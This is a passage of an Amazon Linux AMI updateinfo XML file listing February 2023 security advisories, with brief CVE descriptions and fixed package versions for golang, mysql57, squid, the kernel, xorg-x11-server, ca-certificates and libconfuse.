epoch="0" arch="i686"><filename>Packages/apr-util-freetds-1.5.4-6.19.amzn1.i686.rpm</filename></package><package name="apr-util-ldap" version="1.5.4" release="6.19.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-ldap-1.5.4-6.19.amzn1.i686.rpm</filename></package><package name="apr-util-mysql" version="1.5.4" release="6.19.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-mysql-1.5.4-6.19.amzn1.i686.rpm</filename></package><package name="apr-util-pgsql" version="1.5.4" release="6.19.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-pgsql-1.5.4-6.19.amzn1.i686.rpm</filename></package><package name="apr-util-debuginfo" version="1.5.4" release="6.19.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-debuginfo-1.5.4-6.19.amzn1.i686.rpm</filename></package><package name="apr-util-nss" version="1.5.4" release="6.19.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-nss-1.5.4-6.19.amzn1.i686.rpm</filename></package><package name="apr-util-odbc" version="1.5.4" release="6.19.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-odbc-1.5.4-6.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1685</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1685: medium priority package update for golang</title><issued date="2023-02-15 00:23:00" /><updated date="2023-02-15 00:24:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-23806:
A flaw was found in the elliptic package of the crypto library in golang when the IsOnCurve function could return true for invalid field elements. This flaw allows an attacker to take advantage of this undefined behavior, affecting the availability and integrity of the resource.
CVE-2022-23773:
cmd/go in Go before 1.16.14 and 1.17.x before 1.17.7 can misinterpret branch names that falsely appear to be version tags. This can lead to incorrect access control if an actor is supposed to be able to create branches but not tags.
CVE-2022-23772:
Rat.SetString in math/big in Go before 1.16.14 and 1.17.x before 1.17.7 has an overflow that can lead to Uncontrolled Memory Consumption.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23772" title="" id="CVE-2022-23772" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23773" title="" id="CVE-2022-23773" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23806" title="" id="CVE-2022-23806" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-tests" version="1.16.15" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.16.15-1.38.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.16.15" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.16.15-1.38.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.16.15" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.16.15-1.38.amzn1.x86_64.rpm</filename></package><package name="golang-race" version="1.16.15" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.16.15-1.38.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.16.15" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.16.15-1.38.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.16.15" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.16.15-1.38.amzn1.noarch.rpm</filename></package><package name="golang-shared" version="1.16.15" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-shared-1.16.15-1.38.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.16.15" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.16.15-1.38.amzn1.x86_64.rpm</filename></package><package name="golang-bin" version="1.16.15" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.16.15-1.38.amzn1.i686.rpm</filename></package><package name="golang-shared" version="1.16.15" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/golang-shared-1.16.15-1.38.amzn1.i686.rpm</filename></package><package name="golang" version="1.16.15" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.16.15-1.38.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1686</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1686: medium priority package update for mysql57</title><issued date="2023-02-17 00:02:00" /><updated date="2023-06-07 18:15:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-21963:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Connection Handling). Supported versions that are affected are 5.7.40 and prior and 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Server. CVSS 3.1 Base Score 2.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L).
CVE-2023-21840:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: PS). Supported versions that are affected are 5.7.40 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
CVE-2021-2180:
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.7.33 and prior and 8.0.23 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2180" title="" id="CVE-2021-2180" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21840" title="" id="CVE-2023-21840" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21963" title="" id="CVE-2023-21963" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql57-debuginfo" version="5.7.41" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.41-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.41" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.41-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.41" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.41-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.41" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.41-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.41" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.41-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded" version="5.7.41" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.41-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql57-libs" version="5.7.41" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.41-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.41" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.41-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.41" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.41-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.41" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.41-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.41" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.41-1.18.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.41" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.41-1.18.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.41" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.41-1.18.amzn1.i686.rpm</filename></package><package name="mysql57-test" version="5.7.41" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-test-5.7.41-1.18.amzn1.i686.rpm</filename></package><package name="mysql57-devel" version="5.7.41" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.41-1.18.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.41" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.41-1.18.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.41" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.41-1.18.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.41" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.41-1.18.amzn1.i686.rpm</filename></package><package name="mysql57-server" version="5.7.41" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.41-1.18.amzn1.i686.rpm</filename></package><package name="mysql57-errmsg" version="5.7.41" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.41-1.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1687</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1687: medium priority package update for squid</title><issued date="2023-02-17 00:02:00" /><updated date="2023-02-23 01:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-41317:
A flaw was found in squid. A trusted client can directly access the cache manager information, bypassing the manager ACL protection and resulting in information disclosure.
CVE-2021-33620:
Squid before 4.15 and 5.x before 5.0.6 allows remote servers to cause a denial of service (affecting availability to all clients) via an HTTP response. The issue trigger is a header that can be expected to exist in HTTP traffic without any malicious intent by the server.
CVE-2021-31808:
An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to an input-validation bug, it is vulnerable to a Denial of Service attack (against all clients using the proxy). A client sends an HTTP Range request to trigger this.
CVE-2021-31807:
An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. An integer overflow problem allows a remote server to achieve Denial of Service when delivering responses to HTTP Range requests. The issue trigger is a header that can be expected to exist in HTTP traffic without any malicious intent.
CVE-2021-31806:
An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to a memory-management bug, it is vulnerable to a Denial of Service attack (against all clients using the proxy) via HTTP Range request processing.
CVE-2021-28652:
An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to incorrect parser validation, it allows a Denial of Service attack against the Cache Manager API. This allows a trusted client to trigger memory leaks that. over time, lead to a Denial of Service via an unspecified short query string. This attack is limited to clients with Cache Manager API access privilege.
CVE-2021-28651:
An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to a buffer-management bug, it allows a denial of service. When resolving a request with the urn: scheme, the parser leaks a small amount of memory. However, there is an unspecified attack methodology that can easily trigger a large amount of memory consumption.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28651" title="" id="CVE-2021-28651" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28652" title="" id="CVE-2021-28652" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31806" title="" id="CVE-2021-31806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31807" title="" id="CVE-2021-31807" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31808" title="" id="CVE-2021-31808" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33620" title="" id="CVE-2021-33620" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41317" title="" id="CVE-2022-41317" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-debuginfo" version="3.5.20" release="17.44.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.44.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.44.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.44.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.44.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.44.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.44.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.44.amzn1.i686.rpm</filename></package><package name="squid" version="3.5.20" release="17.44.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.44.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.44.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1688</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1688: important priority package update for kernel</title><issued date="2023-02-17 00:02:00" /><updated date="2024-05-09 17:43:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-4155:
A data leak flaw was found in the way XFS_IOC_ALLOCSP IOCTL in the XFS filesystem allowed for size increase of files with unaligned size. A local attacker could use this flaw to leak data on the XFS filesystem otherwise not accessible to them.
CVE-2021-4002:
A memory leak flaw in the Linux kernel's hugetlbfs memory usage was found in the way the user maps some regions of memory twice using shmget() which are aligned to PUD alignment with the fault of some of the memory pages. A local user could use this flaw to get unauthorized access to some data.
CVE-2021-3923:
A flaw was found in the Linux kernel's implementation of RDMA over infiniband. An attacker with a privileged local account can leak kernel stack information when issuing commands to the /dev/infiniband/rdma_cm device node. While this access is unlikely to leak sensitive user information, it can be further used to defeat existing kernel protection mechanisms.
CVE-2021-3772:
A flaw was found in the Linux SCTP stack. A blind attacker may be able to kill an existing SCTP association through invalid chunks if the attacker knows the IP-addresses and port numbers being used and the attacker can send packets with spoofed IP addresses.
CVE-2021-28715:
Incoming data packets for a guest in the Linux kernel's netback driver are buffered until the guest is ready to process them. There are some measures taken for avoiding to pile up too much data, but those can be bypassed by the guest: There is a timeout how long the client side of an interface can stop consuming new packets before it is assumed to have stalled, but this timeout is rather long (60 seconds by default). Using a UDP connection on a fast interface can easily accumulate gigabytes of data in that time.
CVE-2021-28714:
Incoming data packets for a guest in the Linux kernel's netback driver are buffered until the guest is ready to process them. There are some measures taken for avoiding to pile up too much data, but those can be bypassed by the guest: The timeout could even never trigger if the guest manages to have only one free slot in its RX queue ring page and the next package would require more than one free slot, which may be the case when using GSO, XDP, or software hashing.
CVE-2021-28713:
A denial of service flaw for virtual machine guests in the Linux kernel's Xen hypervisor subsystem was found in the way users call some interrupts with high frequency from one of the guests.
A local user could use this flaw to starve the resources resulting in a denial of service.
CVE-2021-28712:
A denial of service flaw for virtual machine guests in the Linux kernel's Xen hypervisor subsystem was found in the way users call some interrupts with high frequency from one of the guests.
A local user could use this flaw to starve the resources resulting in a denial of service.
CVE-2021-28711:
A denial of service flaw for virtual machine guests in the Linux kernel's Xen hypervisor subsystem was found in the way users call some interrupts with high frequency from one of the guests.
A local user could use this flaw to starve the resources resulting in a denial of service.
CVE-2021-20322:
A flaw in the processing of received ICMP errors (ICMP fragment needed and ICMP redirect) in the Linux kernel functionality was found to allow the ability to quickly scan open UDP ports. This flaw allows an off-path remote user to effectively bypass the source port UDP randomization. The highest threat from this vulnerability is to confidentiality and possibly integrity, because software that relies on UDP source port randomization are indirectly affected as well.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20322" title="" id="CVE-2021-20322" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28711" title="" id="CVE-2021-28711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28712" title="" id="CVE-2021-28712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28713" title="" id="CVE-2021-28713" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28714" title="" id="CVE-2021-28714" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28715" title="" id="CVE-2021-28715" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3772" title="" id="CVE-2021-3772" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3923" title="" id="CVE-2021-3923" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4002" title="" id="CVE-2021-4002" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4155" title="" id="CVE-2021-4155" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.262" release="135.486.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.262-135.486.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.262" release="135.486.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.262-135.486.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.262" release="135.486.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.262-135.486.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.262" release="135.486.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.262-135.486.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.262" release="135.486.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.262-135.486.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.262" release="135.486.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.262-135.486.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.262" release="135.486.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.262-135.486.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.262" release="135.486.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.262-135.486.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.262" release="135.486.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.262-135.486.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.262" release="135.486.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.262-135.486.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.262" release="135.486.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.262-135.486.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.262" release="135.486.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.262-135.486.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.262" release="135.486.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.262-135.486.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.262" release="135.486.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.262-135.486.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.262" release="135.486.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.262-135.486.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.262" release="135.486.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.262-135.486.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.262" release="135.486.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.262-135.486.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.262" release="135.486.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.262-135.486.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.262" release="135.486.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.262-135.486.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.262" release="135.486.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.262-135.486.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1689</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1689: important priority package update for xorg-x11-server</title><issued date="2023-02-17 00:02:00" /><updated date="2023-02-23 01:35:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-46344:
A vulnerability was found in X.Org. This security flaw occurs because the handler for the XIChangeProperty request has a length-validation issues, resulting in out-of-bounds memory reads and potential information disclosure. This issue can lead to local privileges elevation on systems where the X server is running privileged and remote code execution for ssh X forwarding sessions.
CVE-2022-46343:
A vulnerability was found in X.Org. This security flaw occurs because the handler for the ScreenSaverSetAttributes request may write to memory after it has been freed. This issue can lead to local privileges elevation on systems where the X server is running privileged and remote code execution for ssh X forwarding sessions.
CVE-2022-46342:
A vulnerability was found in X.Org. This security flaw occurs because the handler for the XvdiSelectVideoNotify request may write to memory after it has been freed. This issue can lead to local privileges elevation on systems where the X se
CVE-2022-46341:
A vulnerability was found in X.Org. This security flaw occurs because the handler for the XIPassiveUngrab request accesses out-of-bounds memory when invoked with a high keycode or button code. This issue can lead to local privileges elevation on systems where the X server is running privileged and remote code execution for ssh X forwarding sessions.
CVE-2022-46340:
A vulnerability was found in X.Org. This security flaw occurs becuase the swap handler for the XTestFakeInput request of the XTest extension may corrupt the stack if GenericEvents with lengths larger than 32 bytes are sent through a the XTestFakeInput request. This issue can lead to local privileges elevation on systems where the X server is running privileged and remote code execution for ssh X forwarding sessions. This issue does not affect systems where client and server use the same byte order.
CVE-2022-4283:
A vulnerability was found in X.Org. This security flaw occurs because the XkbCopyNames function left a dangling pointer to freed memory, resulting in out-of-bounds memory access on subsequent XkbGetKbdByName requests.. This issue can lead to local privileges elevation on systems where the X server is running privileged and remote code execution for ssh X forwarding sessions.
CVE-2022-2320:
A flaw was found in the Xorg-x11-server. The specific flaw exists within the handling of ProcXkbSetDeviceInfo requests. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. This flaw allows an attacker to escalate privileges and execute arbitrary code in the context of root.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2320" title="" id="CVE-2022-2320" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4283" title="" id="CVE-2022-4283" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46340" title="" id="CVE-2022-46340" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46341" title="" id="CVE-2022-46341" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46342" title="" id="CVE-2022-46342" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46343" title="" id="CVE-2022-46343" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46344" title="" id="CVE-2022-46344" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.50.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.50.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.17.4" release="18.50.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.17.4-18.50.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.50.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.50.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-devel-1.17.4-18.50.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.50.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.17.4-18.50.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.50.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.50.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.50.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.50.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-devel-1.17.4-18.50.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.50.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.50.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.50.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.50.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.50.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.50.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.50.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.50.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.50.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.17.4-18.50.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.50.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.50.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1690</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1690: important priority package update for ca-certificates</title><issued date="2023-02-17 00:02:00" /><updated date="2023-02-23 01:35:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-23491:
Certifi is a curated collection of Root Certificates for validating the trustworthiness of SSL certificates while verifying the identity of TLS hosts. Certifi 2022.12.07 removes root certificates from "TrustCor" from the root store. These are in the process of being removed from Mozilla's trust store. TrustCor's root certificates are being removed pursuant to an investigation prompted by media reporting that TrustCor's ownership also operated a business that produced spyware. Conclusions of Mozilla's investigation can be found in the linked google group discussion.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23491" title="" id="CVE-2022-23491" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ca-certificates" version="2018.2.22" release="65.1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/ca-certificates-2018.2.22-65.1.29.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1692</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1692: important priority package update for libconfuse</title><issued date="2023-02-17 00:02:00" /><updated date="2023-02-23 01:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-40320:
cfg_tilde_expand in confuse.c in libConfuse 3.3 has a heap-based buffer over-read.
